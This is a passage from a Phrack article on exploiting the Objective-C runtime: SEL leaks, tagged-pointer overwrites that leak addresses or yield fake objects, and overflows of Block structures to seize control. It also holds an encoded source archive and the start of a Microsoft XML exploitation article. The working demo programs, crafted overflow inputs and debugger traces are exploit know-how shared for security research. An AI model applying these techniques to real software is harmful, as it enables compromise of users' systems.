This is only a useful approach if we are able to retrieve the value from
this context and utilize it to re-trigger the bug. In the example code
provided, the use of this gadget causes the SEL value to be printed, rather
than the length of the NSString which is intended. You can see the result
of this below.

        -[nemo@objcbox:code]$ ./leak
        [+] buckets is 0x10000000 size.
        [+] cacheentry is 0x30000000 size.
        [+] Setting up buckets
        [+] Done
        [+] Class @ 0x78622240
        [+] Overwriting object
        [+] Calling method
        String length: 0x93371b88

Likewise, in some cases it may not make sense to return the SEL directly.
If it is not possible to retrieve the leaked value upon return it may make
more sense to execute a gadget which writes ecx somewhere in memory. For
example in a web browser context, writing the ecx register into a
JavaScript array which is attacker controlled may result in the ability to
"collect" this value from JavaScript context and re-trigger the bug.

----[ Self Modifying ROP

Another potential use of the single gadget execution primitive is to use
the ecx register containing SEL to modify the rest of a ROP chain prior to
pivoting to use it.

I have never personally been successful with this, however I have seen this
done in a friends exploit.

Finding a gadget which accomplishes all this is extremely challenging.

----[ Arbitrary Write Gadget

The final method for using a single gadget to continue the exploitation
process is to turn the execution primitive into an arbitrary write
primitive.

It is usually fairly straight forward to find a gadget which allows you to
write any high value to a fixed location. By positioning something at this
location (eg 0x0d0d0d0d) this single write can be leveraged to escalate the
available functionality. For example, in a web context. Positioning a
JavaScript array or string at this location then writing to the length
field can be enough to gain an arbitrary read/write primitive from
JavaScript. This is easily enough to finish the exploitation process.

Outside of the browser context there are still a variety of length encoded
data types which can be used for this. Specifically to Objective-C, the
NSMutableArray/NSArray classes work this way.

--[ Tagged Pointers

One of the new features added to the Objective-C runtime is the usage of
"tagged pointers" to conserve resources. Tagged pointers take advantage of
the fact that the system memory allocator will align pointers handed out on
natural alignment boundaries. This means that the low bit will never be
set.

        (lldb) print (long)malloc_good_size(1)
        (long) $0 = 16

The runtime takes advantage of this lower bit in order to indicate that the
pointer value is not to be treated as a regular pointer, and instead, bits
61-63 are used as an index into a table of potential ISA pointers,
registered with the system. This means the first 60 bits can then by used
to store the object payload itself inline.

        Tagged pointer layout

11111111 11111111 11111111 11111111 11111111 11111111 11111111 1111[111][1]
                                                                     |   |
                                                                     |  tag
                                                                   index

As mentioned, index bits index into a table of potential object types. The
default types registered with the runtime is shown below.

    OBJC_TAG_NSAtom            = 0,
    OBJC_TAG_1                 = 1,
    OBJC_TAG_NSString          = 2,
    OBJC_TAG_NSNumber          = 3,
    OBJC_TAG_NSIndexPath       = 4,
    OBJC_TAG_NSManagedObjectID = 5,
    OBJC_TAG_NSDate            = 6,
    OBJC_TAG_7                 = 7

It is possible for a developer to add their own types to the table, however
it is very uncommon for anyone to do this. The guide at [3] clearly
illustrates the mechanics of tagged pointers, if you require more
information.

Now that we've looked at how tagged pointers work, we will investigate some
of them from an exploitation perspective.

----[ Tagged NSAtom

NSAtom is an extremely handy object type for exploitation. In order to use
a tagged NSAtom, we simply need the low bit set indicating a tagged
pointer, and then no bits set in the index bits. The value 0x1 by itself
for example will satisfy this. The beautiful thing about the NSAtom class
is that calling any method name on this class will result in success.

The example code below simply calls the method initWithUTF8String on the
object 0x1. Clearly this is not a valid pointer, and instead is treated as
an NSAtom. Any method name could be used and the result would still be 1.

int main(int argc, const char * argv[])
{
        printf("[+] NSAtom returned: %u\n",[1 initWithUTF8String:"lol"]);
        return 0;
}

$ ./nsatom
[+] NSAtom returned: 1

As you can imagine, this behavior can be extremely useful for
CoE or general exploitation. An example scenario would be, if you are
forced to write through several Objective-C object pointers on the path to
an overwrite target, any method call on those objects would require valid
pointers/fake object setup. However with the NSAtom tagged pointer type,
simply replacing these pointers with the value 0x1 can be enough to stop
the crash and take advantage of the overwrite target.

Also, in extremely specific cases, the fact that this object returns true
can be used to manipulate the path of the program.

----[ Tagged NSString

The next tagged pointer type we will investigate is the tagged NSString.
With the new runtime, when a NSString is created, the size of the string
during initialization dictates the type of storage for the string.

String which are greater than 7 bytes in length are stored on the heap in a
typical Objective-C NSString object. However, for strings of 7-bytes or
less, a tagged pointer with the index 2 is used. The bitpattern for a
tagged NSString is shown below. It is comprised of 7 bytes of string data,
followed by 4 bits for the length, 3-bit for the index into the tagged
pointer types array and finally the low bit to indicate tagged pointer
type.

<-------------------[ String Data ]-------------------->
11111111111111111111111111111111111111111111111111111111[1111][010][1]
                                                [strlen]<---->  |   |
                                                                |  tag
                                                         index: 02

The first scenario in which we can abuse the properties of a tagged
NSString is a partial overwrite into an untagged NSString. The example code
included with this paper (nsstring1.m) demonstrates this.

In this code (shown below) we create an NSString (s) using the C string
contents "thisisaverylongstringnottagged". Since this is not 7 or less
bytes in length this string is stored on the heap, and the object pointer
points to this.

We use the character pointer (ptr) to simulate a 1 byte write into the
least significant byte of the object pointer. This condition can occur from
either a controlled overflow, or an actual 1 byte off-by-one.

We write the value 0xf5 to this byte, and then print the length and
contents of the string.

int main(int argc, const char * argv[])
{
        NSString *s = [[NSString alloc]
initWithUTF8String:"thisisaverylongstringnottagged"];
        char *ptr = (char *)&s;
        *ptr = 0xf5; // NSString Tagged

        printf("[+] NSString @ 0x%lx\n",(unsigned long)s);
        printf("[+] String length: 0x%lx\n",(unsigned long)[s length]);
        NSLog(@"%@",s);

        return 0;
}

The value 0xf5 in the least significant byte has the following bit pattern:

        [1111][010][1]

As you can see, this leaves us with a string length of 0xf, an index of 0x2
and the LSB set to indicate a tagged pointer.

By only using a partial overwrite, we have left the first 7 bytes of the
pointer untouched.

As you can see from the output below, the length of the string is 0xf (15)
after this overwrite. This means that when the NSLog() attempts to print
the string contents, 15 bytes of data are pulled out starting from the
inline data. This leaks the address of the object. If our target allows us
to retrieve a string value and use it, we can turn a one byte overwrite
into an info leak primitive.

        $ ./nsstring1
        [+] NSString @ 0x7fc0db4116f5
        [+] String length: 0xf
        2015-04-04 07:47:26.815 nsstring1[13335:92489992] eeeeeee 3eIjuaj


The next scenario which we will investigate involves overflowing into a
tagged NSString, rather than an un-tagged variant. The example code
nsstring2.m demonstrates this.

In this code, we initialize an NSString with the contents "AAAAAAA". Since
this is only 7 bytes of c-string it guarantees that the NSString will be a
tagged type. This means it will contain the value:

        0x4141414141414175

Essentially the first 7 bytes are taken up with our "A" contents. The last
byte contains the length (7) followed by the bitpattern to indicate
NSString type of tagged pointer.

Next, we once again simulate a single byte overflow into the object
pointer. This time we write the value 0x00, which is a common primitive in
real life due to off-by-one string operations. This forcefully unsets the
tagged LSB in the pointer, turning the tagged string into an un-tagged
type.

Finally we call the length method on the object.

int main(int argc, const char * argv[])
{
        NSString *s = [[NSString alloc] initWithUTF8String:"AAAAAAA"];
        char *ptr = (char *)&s;
        *ptr = 0x00; // un-tag

        printf("[+] NSString @ 0x%lx\n",(unsigned long)s);
        printf("[+] String length: 0x%lx\n",(unsigned long)[s length]);
        NSLog(@"%@",s);

        return 0;
}

As you can imagine, the runtime now treats our tagged object as untagged.
This means that the tagged pointer is now treated as a real pointer. If we
were able to control the contents of the NSString on initialization, this
would present us with direct control over the object cache lookup, allowing
us to use the construct presented earlier in the paper to turn this into
code execution.

(lldb) r
Process 13636 launched: './nsstring2' (x86_64)
[+] NSString @ 0x4141414141414100
Process 13636 stopped
* thread #1: tid = 0x5834fc3, 0x00007fff96c210d7
  libobjc.A.dylib`objc_msgSend + 23, queue = 'com.apple.main-thread', stop
reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
    frame #0: 0x00007fff96c210d7 libobjc.A.dylib`objc_msgSend + 23
libobjc.A.dylib`objc_msgSend + 23:
-> 0x7fff96c210d7:  andq   (%rdi), %r11
   0x7fff96c210da:  movq   %rsi, %r10
   0x7fff96c210dd:  andl   0x18(%r11), %r10d
   0x7fff96c210e1:  shlq   $0x4, %r10
(lldb) reg read rdi
     rdi = 0x4141414141414100

----[ Tagged NSNumber

As you can imagine, the NSNumber case is very similar to that of the
NSString. Any number value which can be contained in the first 7 bytes of
the pointer is stores inline as a tagged NSNumber, rather than performing
an allocation and storing the number on the heap.

The sample code nsnumber1.c demonstrates,once again, a single byte
overwrite into a tagged pointer, containing an inline nsnumber.

In this code, we begin by instantiating an NSNumber containing the value
0xdeadbeeffeedface. The contents of this number are unimportant, however
clearly the number is large enough that it would not fit into the upper
bytes of a tagged pointer, therefore this NSNumber is stored on the heap in
typical Objective-C fashion.

Next, we write the value 0xf7 to the lower byte of the object pointer. Once
again this converts the un-tagged object pointer into a tagged type, while
leaving the upper bits in-tact. Finally, we log the contents of the number
using the method unsignedLongLongValue.

int main(int argc, const char * argv[])
{
        NSNumber *n = [NSNumber numberWithInteger:0xdeadbeeffeedface];
        char *ptr = (char *)&n;
        *ptr = 0xf7;

        NSLog(@"0x%lx\n",(unsigned long)[n unsignedLongLongValue]);
        return 0;
}

As you can see from the output below, rather than printing the initialized
contents (0xdeadbeeffeedface) the NSLog call displays the object pointer
value itself, once again creating an information leak of this value.

$ ./nsnumber1
2015-04-04 09:26:58.701 nsnumber1[14663:92514549] 0x7fd6134116

The final tagged pointer example nsnumber2.m demonstrates the counter case
to this. In this code an NSNumber is instantiated containing the value
0x0041414141414141. As you can see from the leading NULL byte, this value
is small enough that it fits within the first 7 bytes of the object
pointer. Therefore, this object is created as a tagged pointer with the
value:

        0x4141414141414107

We once again truncate the final byte using a character pointer, removing
the tagged bit before calling a method on it (unsignedLongLongValue).

int main(int argc, const char * argv[])
{
        NSNumber *n = [NSNumber numberWithInteger:0x0041414141414141];
        char *ptr = (char *)&n;
        *ptr = 0x00;

        NSLog(@"0x%lx\n",(unsigned long)[n unsignedLongLongValue]);
        return 0;
}

When the method call is made, the runtime treats the numbers contents as a
pointer, and leaves us with a dangling Objective-C message send call, which
we can once again abuse to control execution.

Process 14636 launched: './nsnumber2' (x86_64)
Process 14636 stopped
* thread #1: tid = 0x583a67f, 0x00007fff96c210d7
  libobjc.A.dylib`objc_msgSend + 23, queue = 'com.apple.main-thread', stop
reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
    frame #0: 0x00007fff96c210d7 libobjc.A.dylib`objc_msgSend + 23
libobjc.A.dylib`objc_msgSend + 23:
-> 0x7fff96c210d7:  andq   (%rdi), %r11
   0x7fff96c210da:  movq   %rsi, %r10
   0x7fff96c210dd:  andl   0x18(%r11), %r10d
   0x7fff96c210e1:  shlq   $0x4, %r10
(lldb) reg read rdi
     rdi = 0x4141414141414100

----[ Additional Tagged Types

The additional types in the table have very unique properties. I will leave
it as an exercise to the reader to investigate each of these types for
useful ways they can be used from an exploitation perspective.

--[ Blocks

So, Apple being Apple, decided the tried and tested C standard wasn't good
enough for their magical super fantastic operating system and went ahead
and modified it. They did this by adding a new construct called Blocks.

For anyone familiar with the concept of an anonymous function reference in
Perl, or a lambda function in Python, this is essentially what a Block is.
You can read about blocks in detail in Apple's guide [4]. TL;DR though, a
block basically uses the "^" operator to declare a special type of function
pointer where the body of the function can be defined inline. This is
mostly a syntactic feature, but has a few runtime uses as well. They can be
passed to other functions just like a function pointer, and can access
global data, or data relative to the current executing state they are
defined in. Syntactically blocks are very similar to ecmascript Closures,
however internally they function a little differently as you'll see.

--[ Sample Block Code

Ok let's take a look at how Blocks are defined. Apple's guide [4] provides
the following little example code:


        int main(int ac, char **av)
        {
                int multiplier = 7;

                int (^myBlock)(int) = ^(int num) {

                    return num * multiplier;

                };

                printf("%d\n", myBlock(3));
        }

As you can see, this code defines a block called myBlock which takes an
integer argument "num" and multiplies it with a value "multiplier" taken
from the stack of the main function where the block was declared.

The myBlock Block is then called passing the value 3. As expected when
executed the block is entered and returns the multiplication of 7 * 3.

-[dcbz@squee:~/code/blocks]$ gcc block.c -o block
-[dcbz@squee:~/code/blocks]$ ./block
21

Note, nothing fancy is needed to compile this, Apple's built in compiler
supports Blocks out of the box.

At first glance, i expected this feature to be syntactical only. I thought
the compiler would create a function, and then just add a single call
instruction in the appropriate places. Or maybe a function pointer if
reassignment was required. However if we walk through the assembly listing
for this trivial program we can see that is not even close to the case.

First we have the basic function prologue as expected...

EntryPoint:
       push       rbp                           ; XREF=0x100000e2f
       mov        rbp, rsp
       sub        rsp, 0x50

Next argv/argc are moved into stack variables.

       mov        rax, rsi
       mov        ecx, edi
       mov        dword [ss:rbp-0x50+var_76], ecx
       mov        qword [ss:rbp-0x50+var_64], rax

The value 0x7 is stored in a stack variable to be referenced by the Block.
This it the "multiplier" variable.

       mov        dword [ss:rbp-0x50+var_12], 0x7

Ok now we come to the meat of the Block implementation. As you will see,
there's a little bit of code here, much more than expected. Before we
continue tracing it we need to understand a little bit more about Block
internals.

The free chapter from the book Advanced Mac OS X Programming: The Big Nerd
Ranch Guide [5] has a really nice write up on the internals of Blocks which
makes this next bit really clear.

Basically there are two structures defined for every Block created, the
block_descriptor and block_literal as well as the function containing the
actual byte-code implementation of the Block.

The block literal structure is the most important structure for us to
understand. Majority of the assembly listing we are tracing is used to
populate this structure appropriately. The definition for the structure is
shown below:

        struct block_literal_NAME {
            void *isa;
            int flags;
            int reserved;
            void (*invoke)(void *literal, ...);
            struct block_descriptor_NAME *descriptor;
            /* referenced captured variables follow */
        };

Basically, the use of this structure is to turn our Block into a pseudo
objective-c object. As you can see the typical 'isa' pointer at offset 0
contains a pointer to the base class struct for the object.

In the listing below, we can see that the block_literal struct is being
created at offset rbp-0x50+var_16. The ISA pointer is populated with a
pointer to the class "NSConcreteStackBlock".

       lea        rax, qword [ss:rbp-0x50+var_16]
       mov        rcx, qword [ds:imp___got___NSConcreteStackBlock]
       lea        rcx, qword [ds:rcx]
       mov        qword [ss:rbp-0x50+var_16], rcx

As described in [5], this class indicates that the Block is to be stored on
the stack. Other possible alternative base classes are:
NSConcreteGlobalBlock for global Blocks, NSConcreteMallocBlock for heap
based Blocks, NSConcreteAutoBlock for Blocks affected by garbage collection
and NSConcreteFinalizingBlock for blocks which have a
"finalizer"/destructor which must be run apon garbage collection. Cross
referencing these class structs can give us a pretty good indication where
Blocks are used in a binary, and also their location in memory at runtime.

       mov        dword [ss:rbp-0x50+var_24], 0x40000000

The next element populated is the flags. I won't go into this too much
because the write-up at [5] covers it perfectly. The flags enum stores some
meta information about the Block including garbage collection settings and
whether or not the Block is global.

Next the reserved field is set to 0.

       mov        dword [ss:rbp-0x50+var_28], 0x0

The main_block_invoke_1 function is the invoke() method for this Block. It
basically contains the compiled instructions for the block itself. As you
will see it is called later when the Block is executed.

       lea        rcx, qword [ds:___main_block_invoke_1]
       mov        qword [ss:rbp-0x50+var_32], rcx

Earlier we discussed the fact that there are two structures for every
Block. The second of these, the block descriptor is pre-created at compile
time and stored in the __data section.

       lea        rcx, qword [ds:___block_descriptor_tmp_1.1]
       mov        qword [ss:rbp-0x50+var_40], rcx

The struct definition is as follows:

        static const struct block_descriptor_NAME {
            unsigned long reserved;
            unsigned long literal_size;

            /* helper functions - present only if needed */
            void (*copy_helper)(void *dst, void *src);
            void (*dispose_helper)(void *src);
        };

Basically the only field we care about most of the time is the
literal_size, which contains the total size of the block_literal. The other
function pointers are only used in specific cases.

The rest of the block literal struct contains the arguments to invoke.
A copy of the "multiplier" variable is copied into this struct.

       mov        ecx, dword [ss:rbp-0x50+var_12]
       mov        dword [ss:rbp-0x50+var_48], ecx

Now that the literal struct is populated, the code has to invoke the Block
passing in the arguments. This is done by retrieving the invoke function
pointer from the literal struct populated earlier.

I probably should have used an optimization flag when i compiled this,
because the next couple of instructions are a little silly. A pointer to
the block literal struct is moved into var_0, then moved back into rax...

       mov        qword [ss:rbp-0x50+var_0], rax
       mov        rax, qword [ss:rbp-0x50+var_0]

Next the invoke function pointer is moved into rax by dereferencing this
pointer and adding 16 (0x10).

       mov        rax, qword [ds:rax+0x10]

The pointer to the block literal struct is then moved into rcx.

       mov        rcx, qword [ss:rbp-0x50+var_0]

The value being passed to the Block in the printf() call (3) is temporarily
moved to edx.

       mov        edx, 0x3                      ; arg to block

The block_literal struct pointer is moved to rdi, which is the first
argument in the x86_64 function calling convention (rdi,rsi,rcx,rdx).

       mov        rdi, rcx

The function argument (3) is then moved to esi as the second argument.

       mov        esi, edx

Finally the invoke() method is called. invoke(self,3) basically.

       call       rax

The rest of the assembly listing is just a call to printf to display the
result, followed by the epilogue.

       mov        ecx, eax
       xor        dl, dl
       lea        rdi, qword [ds:0x100000f2c]   ; "%d\\n"
       mov        esi, ecx
       mov        al, dl
       call       imp___stubs__printf
       mov        eax, dword [ss:rbp-0x50+var_60]
       add        rsp, 0x50
       pop        rbp
       ret

As you can see, this process is fairly straight forward, so now that we
understand it we can look at how to abuse it.

--[ Exploitation

In order to demonstrate exploitation scenarios where these Blocks can be
utilized i will start by modifying the example code to contain a trivial
stack overflow.

int main(int ac, char **av)
{
        int multiplier = 7;
        int (^myBlock)(int) = ^(int num) {

            return num * multiplier;

        };
        char buf[20];
        if(ac != 2) {
                printf("error: need 2nd arg\n");
                exit(1);
        }

        strcpy(buf,av[1]);
        printf("%s: %d\n", buf, myBlock(3));
        exit(1);
}

As you can see, prior to the final printf() a call which copies the first
argument to the program into a small stack buffer, without bounds checking,
is added. I also added an exit(1); call to demonstrate that this program
couldn't necessarily be exploited without utilizing the Block. This also
applies to cases where stack cookies (-fstack-protection) are used.

As we saw in the previous example, the block_literal structure used will be
stored on the stack. Also the myBlock pointer to this structure is stored
on the stack in this case.

So what happens when we overflow the buf array in this case? Let's run it
and see.

-[dcbz@squee:~/code/blocks]$ gcc blockof.c -o of
-[dcbz@squee:~/code/blocks]$ ./of
error: need 2nd arg
-[dcbz@squee:~/code/blocks]$ ./of hello
hello: 21
-[dcbz@squee:~/code/blocks]$ gdb ./of
(gdb) r `perl -e'print "A"x5000'`
Starting program: /Users/dcbz/code/blocks/of `perl -e'print "A"x5000'`

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: 13 at address: 0x0000000000000000
0x0000000100000e4e in main ()

As you can see, running this program with a overly large argument overflows
the stack based buffer and we get an EXC_BAD_ACCESS exception. For some
reason gdb claims that it happened at address 0x0. However if we do some
investigation:

(gdb) x/i $pc
0x100000e4e <main+158>: mov    rax,QWORD PTR [rax+0x10]
(gdb) i r rax
rax            0x4141414141414141        4702111234474983745

We can see that the program is crashing dereferencing the block_literal
struct pointer to retrieve the "invoke" pointer. (based on our previous
understanding of the assembly listing.) This means we have overwritten the
pointer to the block_literal struct with a series of 'A's (0x41). Because
the pointer to the struct lies in front of the struct itself we are unable
to modify the invoke pointer directly. Therefore we are left with a very
similar construct to a C++ vptr dereference. We can exploit this in a very
similar fashion.

The construct is essentially "call [ptr+0x10]", therefore we need to
control memory at a known address in order to place a pointer to our
shellcode, then we can use the address of this pointer minus 16 when we
overwrite the block_literal struct pointer. This will result in execution
flow being redirected to our shellcode. Another solution would be to
replace the value of the invoke pointer with another block's invoke method
or known function. Then utilize an argument mismatch in a favorable way.
Both of these things have been documented numerous times so i'm not going
to go into any more detail on this here. Although i will say, in order to
control memory at a fixed location, a few techniques might be, to use the
shared_region_map_file technique, or disable aslr/nx with posix_spawn for
local issues, or use ROP/heapspray for remote issues.

Now that we've looked at the stack overflow case, let's look at what
happens when the block_literal struct contents are on the heap.

To test this basically we can take the test stack overflow we looked at
earlier, and this time move the destination of the strcpy() call to the
heap.

In order to move the Block to the heap we have to utilize a function in the
runtime architecture. Basically libSystem is linked to the block library:
/usr/lib/system/libsystem_blocks.dylib. This library contains functions for
manipulating and displaying Block information. One of the exported
functions, "Block_copy" is used to create a copy of the block on the heap
and return a pointer to it. This is typically used by functions that need
to return a Block, since returning a pointer to a Block on the functions
stack would be fail when the stack unwinds. The heap Block is then
free()'ed via the Block_release function. To call these functions we need
to include the header file "Block.h".

The Block_copy function checks what type of block is being passed to it. If
the Block was allocated on the heap or .bss it simply returns the Block
rather than making a copy. Otherwise a copy is placed on the heap and a
pointer returned, as you can see in the example code below:


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <Block.h>

int main(int ac, char **av)
{
        char *buf = malloc(20);
        int multiplier = 7;
        int (^stackBlock)(int) = ^(int num) {

            return num * multiplier;

        };
        int (^myBlock)(int) = Block_copy(stackBlock);
        if(ac != 2) {
                printf("error: need 2nd arg\n");
                exit(1);
        }

        strcpy(buf,av[1]);
        printf("%s: %d\n", buf, myBlock(3));
        exit(1);
}

Now that we have some sample code, let's compile and run it and see where
overflowing it gets us.

-[dcbz@squee:~/code/blocks]$ gcc bh.c -o bh
-[dcbz@squee:~/code/blocks]$ gdb ./bh
(gdb) r hi
Starting program: /Users/dcbz/code/blocks/bh hi
Reading symbols for shared libraries +............................. done
hi: 21

As expected running it with the string hi, prints the usual output, this
time executing via the heap allocated Block. However if we pass a string of
500 'A's...

Program exited with code 01.
(gdb) r `perl -e'print "A"x500'`
Starting program: /Users/dcbz/code/blocks/bh `perl -e'print "A"x500'`

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: 13 at address: 0x0000000000000000
0x0000000100000dc4 in main ()
(gdb) x/i $pc
0x100000dc4 <main+276>: call   rax
(gdb) i r rax
rax            0x4141414141414141       4702111234474983745

As you can see we get a crash again, however this time rather than it
dereferencing the block_literal pointer, we have overwritten the invoke()
method pointer itself and have directly controlled eip.

As you can imagine both these cases are useful when trying to gain control
of an overflow, especially in the case of stack or heap canaries, or an
unreachable return.

--[ Future Research -- Non Pointer ISA

Unfortunately, due to the fact that i'm trying to coordinate this paper
release with my Infiltrate 2015 talk i am probably not going to have time
to fully research this area prior to publication.

Basically in the Objective-C runtime on the arm64 the ISA pointer can
function as a tagged pointer as well. Due to the nature of the address
space there are a significant number of unused bits in the pointer which
contain an interesting amount of meta-data. The write-up at [6] clearly
explains all this. I will leave the bit pattern below just in case you are
interested. I am particularly eager to investigate the has_cxx_dtor
attribute, as well as the sidetable reference counting information.

(LSB)
1       bit     indexed

        0 is raw isa, 1 is non-pointer isa.

1       bit     has_assoc

        Object has or once had an associated reference. Object with no
        associated references can deallocate faster.

1       bit     has_cxx_dtor

        Object has a C++ or ARC destructor. Objects with no destructor can
        deallocate faster.

30      bits    shiftcls

        Class pointer's non-zero bits.

9       bits    magic

        Equals 0xd2. Used by the debugger to distinguish real objects from
        uninitialized junk.

1       bit     weakly_referenced

        Object is or once was pointed to by an ARC weak variable. Objects
        not weakly referenced can deallocate faster.

1       bit     deallocating

        Object is currently deallocating.

1       bit     has_sidetable_rc

        Object's retain count is too large to store inline.

19      bits    extra_rc

        Object's retain count above 1. (For example, if extra_rc is 5 then
        the object's real retain count is 6.)
(MSB)

--[ Conclusion

Well you made it to the end reader. Hopefully this was useful in some way!
Writing is very painful...

Thanks for reading!

- nemo

--[ References

[1] The Objective-C Runtime: Understanding and Abusing -
        http://phrack.org/issues/66/4.html
[2] Abusing Performance Optimization Weaknesses to Bypass ASLR -
        http://www.cc.gatech.edu/~blee303/paper/BH_ASLR_slides.pdf
[3] - Lets build tagged pointers:
        https://www.mikeash.com/pyblog/ \
        friday-qa-2012-07-27-lets-build-tagged-pointers.html
[4] Apple Block Conceptual -
        http://developer.apple.com/library/ios/#documentation/cocoa/ \
        Conceptual/Blocks/Articles/bxOverview.html#//apple_ref/doc/uid/ \
        TP40007502-CH3-SW1
[5] Big Nerd Ranch Advanced Mac OS X Programming: Block -
        http://www.informit.com/articles/article.aspx?p=1749598&seqNum=12
[6] Non-pointer ISA
        http://www.sealiesoftware.com/blog/archive/2013/09/24/ \
        objc_explain_Non-pointer_isa.html

--[ Appendix - Source Code

begin 644 code.tgz
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
/P<'!\<OB?]V9SVT`4```
`
end


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x0a of 0x10

|=----------------------------------------------------------------------=|
|=---------------=[      The Art of Exploitation      ]=----------------=|
|=----------------------------------------------------------------------=|
|=--=[ Self-patching Microsoft XML with misalignments and factorials ]=-=|
|=----------------------------------------------------------------------=|
|=------------------------=[ by Alisa Esage ]=--------------------------=|
|=-------------------------=[ hey@alisa.sh ]=---------------------------=|
|=----------------------------------------------------------------------=|

                              "Maybe it says something about human nature,
                         that the only form of life we have created so far
                                                   is purely destructive."
                                   --  Stephen Hawking on computer viruses


                              "I've tried to imagine what it would be like
             to be a newcomer [in vulnerability research] in current times
                                             and it's a bit depressing..."
                                               -- Aaron Portnoy for PHRACK




In this article a vulnerable Microsoft XML module is directed into
invulnerable behavior by self-serving a two-byte inline memory patch
through an arbitrary code execution opportunity.


--[ Table of contents

  1 - Introduction

  2 - The vulnerability
    2.1 - The trigger
    2.2 - The impact vectors
    2.3 - Analyzing the crash
    2.4 - Estimating exploitability
    2.5 - Patch analysis and the root cause

  3 - The control
    3.1 - Inflating the stack 1: XSLT recursion
    3.2 - Inflating the stack 2: JavaScript recursion
    3.4 - Filling the memory 1: images
    3.5 - Filling the memory 2: integers
    3.6 - Recursion control
    3.7 - Program counter control

  4 - The self-patch
    4.1 - A leak without a leak
